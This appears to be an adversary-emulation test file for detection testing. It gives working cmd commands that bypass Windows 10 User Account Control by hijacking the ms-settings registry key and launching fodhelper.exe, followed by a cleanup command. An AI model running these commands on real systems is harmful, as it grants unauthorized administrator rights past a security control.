#TechniqueName: Abuse Elevation Control Mechanism: Bypass User Access Control
#AtomicTestName: Bypass UAC using Fodhelper
#Description: Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.&Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.&
#Language: cmd

#commands
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
fodhelper.exe


#cleanup_commands
reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1

